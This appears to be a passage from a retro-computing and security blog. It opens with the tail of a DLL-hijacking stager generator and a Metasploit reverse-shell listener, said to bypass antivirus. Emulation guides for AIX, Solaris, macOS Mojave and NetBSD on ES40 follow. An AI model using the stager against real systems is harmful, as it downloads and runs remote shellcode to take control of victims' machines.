echo ' winsock_init();'>> custom-temp.c
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>> custom-temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>> custom-temp.c
echo ' if (count != 4 || size <= 0)'>> custom-temp.c
echo ' punt(my_socket, "error lenght\n");'>> custom-temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>> custom-temp.c
echo ' if (buffer == NULL)'>> custom-temp.c
echo ' punt(my_socket, "error in buf\n");'>> custom-temp.c
echo ' buffer[0] = 0xBF;'>> custom-temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);'>> custom-temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);'>> custom-temp.c
echo ' function = (void (*)())buffer;'>> custom-temp.c
echo ' function();'>> custom-temp.c
echo ' return 0;'>> custom-temp.c
echo '}' >> custom-temp.c
done;

cat temp.c custom-temp.c > final-temp.c

echo 'Compiling C code to Dll ..'
#x86_64-w64-mingw32-gcc final-temp.c -o payload.dll -lws2_32 -shared
i686-w64-mingw32-gcc-7.3-win32 final-temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
echo 'Renaming to' $dllfilename
mv payload.dll $dllfilename 
ls -la $dllfilename

The script will produce a DLL whose filename needs to be the same as the one we are going to spoof. In our case we call it TextInputFramework.dll

Next is a simple Listener script for the Metasploit framework to make things easier (place it in the metasploit-framework root dir)

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " Metasploit custom listener for DLL exploit "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port

echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh

echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh

# Set the runtime options for autorun 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

So now we should have everything ready for the attack demonstration. Load the above listener and upload TextInputFramework.dll to the Win10 environment, placing it in the directory where the vulnerable putty.exe is. Then just execute putty.exe and a Meterpreter shell should pop up on your attacker box. Pretty neat, hey? We have bypassed the latest MS AV as well.

Video demonstration below

Enjoy

Running AIX 1.3 inside Virtual Box 5.2.16


IBM AIX has been around for many years, actually it's 32 years now. The latest version is AIX 7.2 and runs only on the IBM ppc64 architecture. However around the end of the 1980s a special port of AIX came out called AIX PS/2 or AIX386.

This short article will be about running this archaic version ( AIX PS/2 1.3) inside VirtualBox 5.2.16 (will work on all older releases too) on Linux x86_64 (will work on macOS and Windows too as long as you get VirtualBox running)

There is some information available still on the internet about AIX PS/2 1.3 for example here :

The last link contains all the needed floppy images (19 at minimum) to get the base install done. Setup is lengthy and tricky (after all, this system is from the early 90s, and if you don’t get all the things right it is very frustrating). So if you want to give it a try yourself, go ahead, it's tons of fun. I will spare you the pain and time and provide the 2 needed boot floppy images and the VMDK image for your convenience

Download the AIX-1.3.tar.bz2 here https://drop.me/BlxnAD

Once you download the compressed tarball, decompress and extract it and place the files in a working directory for your VirtualBox files. Please note that AIX-1.3.vmdk is identical to aix.vmdk; it's there only as a backup in case we mess something up.

user@panasonic ~/Downloads/AIX $ ls -la
total 32680
drwxr-xr-x  2 user user     4096 Sep 14 21:43 .
drwxr-xr-x 18 user user     4096 Sep 14 21:43 ..
-rw-rw-r--  1 user user 33453495 Sep 14 21:43 AIX-1.3.tar.bz2
user@panasonic ~/Downloads/AIX $ bunzip2 AIX-1.3.tar.bz2 
user@panasonic ~/Downloads/AIX $ tar -xvf AIX-1.3.tar 
AIX-1.3/
AIX-1.3/floppy02.img
AIX-1.3/floppy01.img
AIX-1.3/AIX-1.3.vmdk
AIX-1.3/aix.vmdk
user@panasonic ~/Downloads/AIX $

We will prepare a new VirtualBox guest called AIX and configure it with the custom drive (aix.vmdk) as a PS/2 other target with 32 MB RAM as follows:

Choose floppy01.img as your boot disk and boot the guest

Choose Boot from Diskette (the aix.vmdk does not have MBR so you will always need to use the 2 floppies to boot it)

Select unix.gen (default) module to load, System mode: Multi User (press space to choose) and Run system from hard disk : Yes (press space to choose it)

You will be asked to insert 2nd boot disk, so swap to floppy2.img and press enter.

Now you can login as root, the password is password.

As noted by Supratim Sanyal you can even run a graphical X11 environment by typing

# xinit

And later once in the X11 environment you can execute xdt (IBM Graphical Desktop)

Here is a short video of the above

Also here are some test runs on booting AIX 7.1 and 7.2 in Qemu 3.0.50 on x86_64

And

Running Solaris 2.6 (sparc) on qemu-system-sparc in Linux x86_64 (Mint 19)

Next chapter in our Computer Archaeology articles. This time it is about emulating the legendary Sun Solaris 2.6, which dates back to July 1997 and included Kerberos 5, PAM, TrueType fonts, WebNFS, large file support and enhanced procfs. It was also known as SunOS 5.6.

Qemu can emulate many CPU architectures; we will be concerned only with Sparc (qemu-system-sparc). I usually build qemu from source ( https://github.com/qemu/qemu.git ), so for this exercise I'm using the below qemu version compiled on Linux Mint 19:

QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)
Copyright (c) 2003-2017 Fabrice Bellard and the QEMU Project developers

The compilation is pretty straightforward and takes some time if we decide to compile all the emulation platforms supported by Qemu.

Also, what I found very handy is the Linux build of the RealVNC viewer from here ( https://www.realvnc.com/en/connect/download/viewer/ ), used as a VNC viewer with Qemu, since the SDL support seems flaky sometimes and breaks some character display in Solaris 2.6 in Qemu.

Next we need to get our hands on the installer CD ISO for Sun Solaris 2.6 and ss5.bin (the SPARCstation 5 PROM). I have uploaded the gzipped tarball of the ISO and the bin here

https://drop.me/omV3jb

Once we download the archive we extract it to a working directory where we will hold our Solaris 2.6 environment

user@panasonic ~/SOLARIS $ gunzip sol26.tar.gz 
user@panasonic ~/SOLARIS $ tar -xvf sol26.tar 
Sun-Solaris-2.6-sparc/
Sun-Solaris-2.6-sparc/solaris-2.6-sparc.iso
Sun-Solaris-2.6-sparc/ss5.bin
user@panasonic ~/SOLARIS $ cd Sun-Solaris-2.6-sparc/
user@panasonic ~/SOLARIS/Sun-Solaris-2.6-sparc $ ls -la
total 552868
drwxr-xr-x 2 user user 4096 Sep 21 10:51 .
drwxr-xr-x 3 user user 4096 Sep 21 23:52 ..
-rw-r--r-- 1 user user 565862400 Sep 21 10:51 solaris-2.6-sparc.iso
-rw-r--r-- 1 user user 262144 Sep 21 10:51 ss5.bin

So we end up with 2 files in the Sun-Solaris-2.6-sparc directory (installation ISO and PROM image). Next we will create a QCOW image for the HDD and set up some networking prerequisites. The following will create a 36GB QCOW image v3

$ qemu-img create -f qcow2 disk.img 36G
Formatting 'disk.img', fmt=qcow2 size=38654705664 cluster_size=65536 lazy_refcounts=off refcount_bits=16
$ file disk.img 
disk.img: QEMU QCOW Image (v3), 38654705664 bytes

Next we will configure the networking and the /etc/qemu-ifup script. The networking script can be saved in the emulation directory and needs to be executed with root privileges prior to running qemu (adjust to your needs here: enp0s25 is eth0 and wlp9s0 is wlan0). Let's call this network.sh

#!/bin/sh
# Setup tap and bridge (run as root before starting qemu).
# enp0s25 is the wired NIC (eth0), wlp9s0 the wireless uplink (wlan0).
# tap0 is owned by "user" so qemu can open it; br0 bridges it with
# enp0s25 and VirtualBox's vboxnet0, and the host masquerades the
# 10.0.2.0/24 guest network out through wlp9s0.
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Next we replace the /etc/qemu-ifup  script with the below

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
    ip link set "$1" up
else
    brctl=$(which brctl)
    if [ ! "$ip" -o ! "$brctl" ]; then
        echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
        exit 0
    fi
    ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
    awk '/^default / {
        for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
    }'
)

# Override the detected default-route interface: always use the br0
# bridge created by network.sh above.
switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
    if [ -d /sys/class/net/$br/bridge/. ]; then
        if [ -n "$ip" ]; then
            ip link set "$1" master "$br"
        else
            brctl addif $br "$1"
        fi
        exit    # exit with status of the previous command
    fi
done

echo "W: $0: no bridge for guest interface found" >&2

So once we are ready we launch network.sh and move on to prepare the newly created disk.img for the Solaris 2.6 installation. We will be running a simulated Sparc machine with 128 MB RAM, disguised as a SPARCstation 5.

You need to run this as root

# qemu-system-sparc -L . -m 128 -M SS-5 -bios ss5.bin -drive file=disk.img,bus=0,unit=0,media=disk -drive file=solaris-2.6-sparc.iso,bus=0,unit=6,media=cdrom -net nic -net tap -display vnc=:1

Next we must load the TightVNC viewer to connect to the console (127.0.0.1:5901 or :1)

We enter boot cdrom:d -vs (boot in single-user mode from the ISO)

Next we need to load the disk labeling/formatting tool by entering format in the root shell

Next we select 16 Other

We enter 24620 as the number of cylinders

Enter 27 as the number of heads

Number of data sectors/track: 107

Accept the default values for the rest until you reach the disk name: Qemu36GB

Next we get thrown to the format prompt, where we finally run label on it

Once we see the below message about the corrupt label we run l

Now we are finally done; we can quit and reboot

So once we are in the SPARC boot prompt again we issue boot cdrom:d

Next the installer X11 screen should pop up

So we choose whatever suits us; this part is pretty straightforward

!!! Select the Manual Reboot option here, since we need to make some changes to the system before we reboot it !!!

Finally the installation will start; it will take some time to finish, so we can grab a cup of coffee

After the installer finishes we are left with a root shell in which we need to do a few things

We need to edit /a/etc/system and add the following value at the end of it, as seen in the screenshot below: set scsi_options=0x58

Add the default route to the network config file /a/etc/defaultrouter: 10.0.2.2

Add the following to /a/etc/nsswitch.conf via vi: hosts: files dns

We define a nameserver (Google) in /a/etc/resolv.conf: nameserver 8.8.8.8

Finally we add the aliases to /a/etc/hosts

Now we are ready to reboot the installer, so just type reboot in the root shell

Yet again we are back at the SPARC boot prompt; however, this time we boot the disk with Solaris

Next we define the root password

We will be given a choice to run either the CDE or OpenDesktop environment next. I choose CDE (I love the design, but hate the insecurity of it)

So by now we should have a fully working, networked Sun Solaris 2.6 environment, reachable at 10.0.2.10 from the Linux Mint system (thanks to br0 and tun0) and able to communicate with the internet via the HotJava browser (very limited nowadays)

And finally an Nmap scan of the default Sun Solaris 2.6 installation

# nmap -sS -sV -vv 10.0.2.10
Starting Nmap 7.70SVN ( https://nmap.org ) at 2018-09-21 22:45 CEST
NSE: Loaded 44 scripts for scanning.
Initiating ARP Ping Scan at 22:45
Scanning 10.0.2.10 [1 port]
Completed ARP Ping Scan at 22:45, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:45
Completed Parallel DNS resolution of 1 host. at 22:45, 0.02s elapsed
Initiating SYN Stealth Scan at 22:45
Scanning 10.0.2.10 [1000 ports]
Discovered open port 25/tcp on 10.0.2.10
Discovered open port 111/tcp on 10.0.2.10
Discovered open port 21/tcp on 10.0.2.10
Discovered open port 23/tcp on 10.0.2.10
Discovered open port 13/tcp on 10.0.2.10
Discovered open port 512/tcp on 10.0.2.10
Discovered open port 514/tcp on 10.0.2.10
Discovered open port 79/tcp on 10.0.2.10
Discovered open port 32775/tcp on 10.0.2.10
Discovered open port 32773/tcp on 10.0.2.10
Discovered open port 515/tcp on 10.0.2.10
Discovered open port 6000/tcp on 10.0.2.10
Discovered open port 32772/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 0 to 5 due to 144 out of 479 dropped probes since last increase.
Discovered open port 32777/tcp on 10.0.2.10
Discovered open port 6112/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 5 to 10 due to 30 out of 99 dropped probes since last increase.
Increasing send delay for 10.0.2.10 from 10 to 20 due to 13 out of 41 dropped probes since last increase.
Discovered open port 32774/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 20 to 40 due to 11 out of 33 dropped probes since last increase.
Discovered open port 4045/tcp on 10.0.2.10
Increasing send delay for 10.0.2.10 from 40 to 80 due to 11 out of 33 dropped probes since last increase.
Discovered open port 32771/tcp on 10.0.2.10
Discovered open port 9/tcp on 10.0.2.10
Discovered open port 1099/tcp on 10.0.2.10
Discovered open port 7100/tcp on 10.0.2.10
Discovered open port 19/tcp on 10.0.2.10
Discovered open port 37/tcp on 10.0.2.10
Discovered open port 32776/tcp on 10.0.2.10
Discovered open port 513/tcp on 10.0.2.10
Discovered open port 7/tcp on 10.0.2.10
Discovered open port 32779/tcp on 10.0.2.10
Discovered open port 32778/tcp on 10.0.2.10
Completed SYN Stealth Scan at 22:46, 57.78s elapsed (1000 total ports)
Initiating Service scan at 22:46
Scanning 28 services on 10.0.2.10
Completed Service scan at 22:49, 151.13s elapsed (28 services on 1 host)
NSE: Script scanning 10.0.2.10.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:49
Completed NSE at 22:49, 1.07s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:49
Completed NSE at 22:49, 1.07s elapsed
Nmap scan report for 10.0.2.10
Host is up, received arp-response (0.00031s latency).
Scanned at 2018-09-21 22:45:33 CEST for 211s
Not shown: 972 closed ports
Reason: 972 resets
PORT      STATE SERVICE          REASON          VERSION
7/tcp     open  echo             syn-ack ttl 255
9/tcp     open  discard?         syn-ack ttl 255
13/tcp    open  daytime          syn-ack ttl 255 Sun Solaris daytime
19/tcp    open  chargen          syn-ack ttl 255
21/tcp    open  ftp              syn-ack ttl 255 Sun SunOS ftpd 5.6
23/tcp    open  telnet           syn-ack ttl 255 Sun Solaris telnetd
25/tcp    open  smtp             syn-ack ttl 255 Sendmail SMI-8.6/SMI-SVR4
37/tcp    open  time             syn-ack ttl 255 (32 bits)
79/tcp    open  finger           syn-ack ttl 255 Sun Solaris fingerd
111/tcp   open  rpcbind          syn-ack ttl 255 2-4 (RPC #100000)
512/tcp   open  exec             syn-ack ttl 255
513/tcp   open  login            syn-ack ttl 255
514/tcp   open  tcpwrapped       syn-ack ttl 255
515/tcp   open  printer          syn-ack ttl 255 Sun Solaris lpd
1099/tcp  open  rmiregistry      syn-ack ttl 255 Java RMI
4045/tcp  open  nlockmgr         syn-ack ttl 255 1-4 (RPC #100021)
6000/tcp  open  X11              syn-ack ttl 255 (access denied)
6112/tcp  open  dtspc?           syn-ack ttl 255
7100/tcp  open  font-service     syn-ack ttl 255 Sun Solaris fs.auto
32771/tcp open  rpcbind          syn-ack ttl 255
32772/tcp open  kcms_server      syn-ack ttl 255 1 (RPC #100221)
32773/tcp open  cachefsd         syn-ack ttl 255 1 (RPC #100235)
32774/tcp open  status           syn-ack ttl 255 1 (RPC #100024)
32775/tcp open  ttdbserverd      syn-ack ttl 255 1 (RPC #100083)
32776/tcp open  sometimes-rpc15? syn-ack ttl 255
32777/tcp open  dmispd           syn-ack ttl 255 1 (RPC #300598)
32778/tcp open  snmpXdmid        syn-ack ttl 255 1 (RPC #100249)
32779/tcp open  ttsession        syn-ack ttl 255 1-4 (RPC #1342177279)
MAC Address: 52:54:00:12:34:56 (QEMU virtual NIC)
Service Info: Hosts: solaris, solaris.; OSs: Solaris, Unix; CPE: cpe:/o:sun:sunos, cpe:/o:sun:sunos:5.6

Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 211.79 seconds
           Raw packets sent: 1984 (87.280KB) | Rcvd: 1320 (52.932KB)

Solaris is pretty much dead now it seems … and I leave it as it is (its dead ass by the road …)
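
The scan above is a useful inventory of what a 1997 default install exposes. Here is an added Python example (not part of the blog post) that parses the -vv port table nmap printed and groups the open services the way a defender would triage them: cleartext logins, information-leak daemons, RPC programs and remote display. SAMPLE_SCAN is a constructed excerpt of the page's output; the exposure classes are my own grouping.

```python
"""Triage of an ``nmap -sS -sV -vv`` port table from a legacy Solaris host.

Added example, not part of the blog post: parses the table layout nmap prints
with -vv (PORT STATE SERVICE REASON VERSION), extracts RPC program numbers,
and groups open ports by exposure class. SAMPLE_SCAN is a constructed excerpt
of the Solaris 2.6 scan shown above.
"""
import re
from collections import defaultdict

SAMPLE_SCAN = """\
Not shown: 972 closed ports
PORT      STATE SERVICE          REASON          VERSION
7/tcp     open  echo             syn-ack ttl 255
9/tcp     open  discard?         syn-ack ttl 255
13/tcp    open  daytime          syn-ack ttl 255 Sun Solaris daytime
21/tcp    open  ftp              syn-ack ttl 255 Sun SunOS ftpd 5.6
23/tcp    open  telnet           syn-ack ttl 255 Sun Solaris telnetd
25/tcp    open  smtp             syn-ack ttl 255 Sendmail SMI-8.6/SMI-SVR4
37/tcp    open  time             syn-ack ttl 255 (32 bits)
79/tcp    open  finger           syn-ack ttl 255 Sun Solaris fingerd
111/tcp   open  rpcbind          syn-ack ttl 255 2-4 (RPC #100000)
512/tcp   open  exec             syn-ack ttl 255
513/tcp   open  login            syn-ack ttl 255
514/tcp   open  tcpwrapped       syn-ack ttl 255
4045/tcp  open  nlockmgr         syn-ack ttl 255 1-4 (RPC #100021)
6000/tcp  open  X11              syn-ack ttl 255 (access denied)
32776/tcp open  sometimes-rpc15? syn-ack ttl 255
32779/tcp open  ttsession        syn-ack ttl 255 1-4 (RPC #1342177279)
"""

# One port line: "<port>/<proto> <state> <service> <reason> [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+(?: ttl \d+)?)\s*(?P<version>.*)$"
)
RPC_PROGRAM = re.compile(r"\(RPC #(\d+)\)")

# nmap service names grouped by the exposure they represent (my own grouping).
EXPOSURE = {
    "cleartext-auth": {"ftp", "telnet", "login", "exec", "shell"},
    "info-leak": {"echo", "discard", "daytime", "chargen", "time", "finger"},
    "remote-display": {"X11", "font-service"},
    "rpc": {"rpcbind", "nlockmgr", "status", "ttdbserverd", "cachefsd",
            "kcms_server", "dmispd", "snmpXdmid", "ttsession"},
}


def parse_port_table(text):
    """Return one dict per port line; all other report lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["port"] = int(row["port"])
        row["guessed"] = row["service"].endswith("?")  # nmap marks unsure names with '?'
        row["service"] = row["service"].rstrip("?")
        rpc = RPC_PROGRAM.search(row["version"])
        row["rpc_program"] = int(rpc.group(1)) if rpc else None
        rows.append(row)
    return rows


def classify(row):
    """Map a parsed row to an exposure class; unknown services land in 'other'."""
    # Anything advertising an RPC program number is RPC whatever nmap named it,
    # as are the high ports nmap could only guess as 'sometimes-rpc'.
    if row["rpc_program"] is not None or row["service"].startswith("sometimes-rpc"):
        return "rpc"
    for name, services in EXPOSURE.items():
        if row["service"] in services:
            return name
    return "other"


def triage(text):
    """Group the open ports of a scan by exposure class, preserving report order."""
    report = defaultdict(list)
    for row in parse_port_table(text):
        if row["state"] == "open":
            report[classify(row)].append(row["port"])
    return dict(report)


def rpc_programs(text):
    """Sorted RPC program numbers nmap identified (100000 is rpcbind itself)."""
    return sorted({r["rpc_program"] for r in parse_port_table(text) if r["rpc_program"]})
```

Feed it the full report and the "cleartext-auth" and "rpc" buckets are the first things to shut off in inetd.conf or firewall off on the host side.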

Acknowledgement :  I would like to thank the following authors for their valuable information as well as inspiration

Formatting disks for Solaris –  https://virtuallyfun.com/2010/10/03/formatting-disks-for-solaris/

Revisiting a Solaris on Qemu install – https://virtuallyfun.com/wordpress/2017/12/06/revisiting-a-solaris-on-qemu-install/

Setting up TUN/TAP networking – https://tthtlc.wordpress.com/2015/10/21/qemu-how-to-setup-tuntap-bridge-networking/

Running macOS Mojave 10.14 on VirtualBox 5.2.18 on Linux x86_64

Short entry here, since the earlier article covered how to set up the Mojave Beta in VirtualBox, and Apple released the stable Mojave yesterday. Maybe somebody will find it useful.

We will download the Mojave dmg via the App Store from the Mojave-Beta VBox guest that we installed earlier (you can download the ready-made ISO from here https://drop.me/oj2GJl )

Without actually installing it, after the download has finished we run the following set of commands to create the Mojave.iso

hdiutil create -o /tmp/Mojave.cdr -size 6000m -layout SPUD -fs HFS+J
hdiutil attach /tmp/Mojave.cdr.dmg -noverify -mountpoint /Volumes/install_build
sudo /Applications/Install\ macOS\ Mojave.app/Contents/Resources/createinstallmedia --volume /Volumes/install_build
mv /tmp/Mojave.cdr.dmg ~/Desktop/
hdiutil detach /Volumes/Install\ macOS\ Mojave/
hdiutil convert ~/Desktop/Mojave.cdr.dmg -format UDTO -o ~/Desktop/Mojave.iso

Next we upload the Mojave.iso to our Linux host and continue with the standard macOS VirtualBox setup (in the first stage attach Mojave.iso; clover.iso will be used in the second one)

You can download the macOS Mojave from here https://drop.me/oj2GJl

Before we run the VM, make sure you execute the following script to set up VirtualBox for macOS; replace the NAME variable with the name of the VirtualBox guest.

#!/bin/bash
readonly VM_RES="1680x1050"
readonly NAME="Mojave"

VBoxManage modifyvm "$NAME" --usbxhci on --firmware efi --chipset ich9 --mouse usbtablet --keyboard usb
VBoxManage setextradata "$NAME" "CustomVideoMode1" "${VM_RES}x32"
VBoxManage setextradata "$NAME" VBoxInternal2/EfiGraphicsResolution "$VM_RES"
VBoxManage modifyvm "$NAME" --cpuidset 00000001 000106e5 00100800 0098e3fd bfebfbff
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "$NAME" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1

Also the following networking script is used (adjust accordingly) for the following network config in VirtualBox

If you don't care about virtual VLANs you can just use the default NAT and choose DHCP in the macOS install

#!/bin/sh
# Setup tap and bridge (run as root before starting the guest).
# enp0s25 is the wired NIC (eth0), wlp9s0 the wireless uplink (wlan0).
# tap0 is owned by "user"; br0 bridges it with enp0s25 and VirtualBox's
# vboxnet0, and the host masquerades the 10.0.2.0/24 guest network
# out through wlp9s0.
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Next we go on with the normal Mojave.iso boot

Once we get to the first setup screen, "erase" the disk with APFS and start the installation; don't worry that VirtualBox does not understand APFS partitions in UEFI, we have the custom Clover.iso loader for that during the 2nd stage install.

Once the 1st stage installer finishes, it will reboot and you will end up yet again in the same setup window, since we did not switch the ISO; so just terminate the macOS guest and swap the Mojave.iso for Clover.iso

You can download Clover.iso with APFS support here https://drop.me/MRqW76

Boot the guest VM again and in the Clover menu choose Boot macOS Install from Mojave (the name of the disk I chose during the 1st stage setup) (use the arrow keys to navigate the Clover menu)

Next we continue with the standard setup

After it finishes, it will reboot but will get stuck on the following screen, so just hard reset here, no problem

Boot again with the Clover.iso still attached (we will use Clover to load macOS) and choose Boot macOS from Mojave (use the arrow keys to navigate the Clover menu)

Next we configure network (adjust accordingly)

And welcome to your new macOS 10.14 Mojave !


NetBSD 8 on Alpha ES40 simulator

ES40 is the only open source emulator for the HP (DEC, Compaq) AlphaServer ES40. The current version is capable of running OpenVMS with some limitations. It emulates the Alpha AXP EV68CB processor and other devices. ES40 emulator development has virtually been halted since 2009. The following will be about ES40 Version 0.18+

So sorry kids, no under 18s here

The homepage of the ES40 project is still up here http://es40.org/Homepage and it is pretty straightforward to follow their build instructions, which I'm gonna cover briefly here ….

I could not run NetBSD/OpenBSD via Alphavm_free and I have covered it here https://astr0baby.wordpress.com/2017/05/30/alphavm_free-and-bsds/

So the only choice now is really hardcore hacking via qemu-system-alpha or the ancient ES40. So will ES40 work with the recent NetBSD 8? Assuming you have your environment set up for building stuff, I will only cover the fundamental dependencies for the ES40 build

  • Poco C++ libraries
  • Libpcap-devel
  • libX11-devel
  • SDL-devel

# apt-get install libpcap-dev build-essential unzip libx11-dev libsdl-dev automake autotools-dev libpoco-dev libxt-dev checkinstall

So lets build this now

# This will pull latest sources and clone it to es40 directory 
cvs -d:pserver:anonymous@es40.cvs.sourceforge.net:/cvsroot/es40 login     (hit enter) 
cvs -z3 -d:pserver:anonymous@es40.cvs.sourceforge.net:/cvsroot/es40 checkout -P es40

$ cd es40 
$ chmod +x configure 
$ chmod +x configure_1.sh
$ chmod +x configure_2.sh
$ cp config/config.guess  .
$ ./configure
This is the debug-options configuration script for the ES40 emulator
If you don't want any debugging options enabled, answer YES to the
following question
Do you want the defaults for all options? (yes, no) [yes]: yes   (we don't want debug now) 
......
$ make 
......
$ cd src 
$ ls -la es40     <-- this will be our main emulator binary
-rwxr-xr-x 1 user user 5241664 Oct 11 21:56 es40

Next we prepare the working directory where we will hold the images, ISOs and ROM files as well as the es40 binary. We will need a couple of files, so let's describe them and download them

cl67srmrom.exe is the SRM firmware (also called the SRM console), the boot firmware written by DEC for systems based on the Alpha AXP microprocessor; downloadable here https://drop.me/MRq778

netbsd8.iso is our NetBSD Alpha ISO downloadable from here http://ftp.netbsd.org/pub/NetBSD/iso/8.0/NetBSD-8.0-alpha.iso

So we place these 2 files into the working directory where we will hold our simulation

$ mkdir ~/RUN 
$ cd ~/RUN 
$ cp ~/es40/src/es40 . 
$ wget http://ftp.netbsd.org/pub/NetBSD/iso/8.0/NetBSD-8.0-alpha.iso

Download the https://drop.me/MRq778 and place the cl67srmrom.exe here 
So you should have these files present 
$ ls -la 
total 387732
drwxr-xr-x 2 user user      4096 Oct 11 22:20 .
drwxr-xr-x 4 user user      4096 Oct 11 22:10 ..
-rw-r--r-- 1 user user    693248 Oct 11 22:20 cl67srmrom.exe
-rwxr-xr-x 1 user user   5241664 Oct 11 22:10 es40
-rw-r--r-- 1 user user 391090176 Oct 11 22:20 netbsd8.iso

Let's configure the es40 configuration file now (this holds all the needed info for the emulator) and save this file as /etc/es40.cfg

{
keyboard.use_mapping = false;
keyboard.map = "keys.map";
}

sys0 = tsunami 
{
rom.srm = "cl67srmrom.exe";
rom.decompressed = "decompressed.rom";
rom.flash = "flash.rom";
rom.dpr = "dpr.rom";
memory.bits = 29;

cpu0 = ev68cb { icache = false; speed = 800M; }
pci0.7 = ali{
mouse.enabled = false;
lpt.outfile = "lpt.out";
}

pci0.3 = sym53c810
{ 
disk0.0 = file { 
file = "disk0-es40.img";
read_only = false;
cdrom = false;
autocreate_size = 6000M;
}
disk0.4 = file {
file = "netbsd8.iso";
read_only = true;
cdrom = true;
}
disk0.5 = ramdisk 
{ size = 10M; } 
}

pci0.4 = dec21143 
{ adapter = "tap0"; mac = "08-00-2B-E5-40-00"; }

serial0 = serial 
{ port = 21264; }

}
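
Because a stray character in this file is only reported once the emulator is already running as root, it is worth checking it first. Here is an added Python example (not part of the blog post or of the ES40 project) that parses the es40.cfg block syntax shown above into nested dicts and rejects a missing ';'; ES40_CFG is a trimmed copy of the page's configuration used as sample input, and the "_type" / "_anonymous" keys are my own naming.

```python
"""Parser for the block-structured es40.cfg syntax shown above.

Added example, not part of the blog post or of the ES40 project: it reads
``name = type { key = value; ... }`` blocks (nested) and the anonymous
``{ ... }`` block into plain dicts, so a config can be checked for typos such
as a missing ';' before the emulator is started as root.
"""
import re

# Trimmed copy of the page's configuration, used as sample input.
ES40_CFG = """
{
keyboard.use_mapping = false;
keyboard.map = "keys.map";
}
sys0 = tsunami
{
memory.bits = 29;
cpu0 = ev68cb { icache = false; speed = 800M; }
pci0.3 = sym53c810
{
disk0.0 = file { file = "disk0-es40.img"; read_only = false; cdrom = false; }
disk0.4 = file { file = "netbsd8.iso"; read_only = true; cdrom = true; }
}
pci0.4 = dec21143 { adapter = "tap0"; mac = "08-00-2B-E5-40-00"; }
serial0 = serial { port = 21264; }
}
"""

# One token per match: a punctuation character, a quoted string, or a bare word.
TOKEN_RE = re.compile(r'\s*(?:([{}=;])|"([^"]*)"|([A-Za-z0-9_.\-]+))')


def tokenize(text):
    """Return (kind, value) pairs; kind is one of '{', '}', '=', ';', 'str', 'word'."""
    tokens, pos = [], 0
    while text[pos:].strip():  # stop once only whitespace is left
        m = TOKEN_RE.match(text, pos)
        if m is None:
            raise ValueError("unexpected character %r at offset %d" % (text[pos:].lstrip()[0], pos))
        pos = m.end()
        punct, string, word = m.groups()
        if punct:
            tokens.append((punct, None))
        elif string is not None:
            tokens.append(("str", string))
        else:
            tokens.append(("word", word))
    return tokens


def _scalar(kind, value):
    """Quoted strings stay strings; bare true/false and plain integers are converted."""
    if kind == "str":
        return value
    if value in ("true", "false"):
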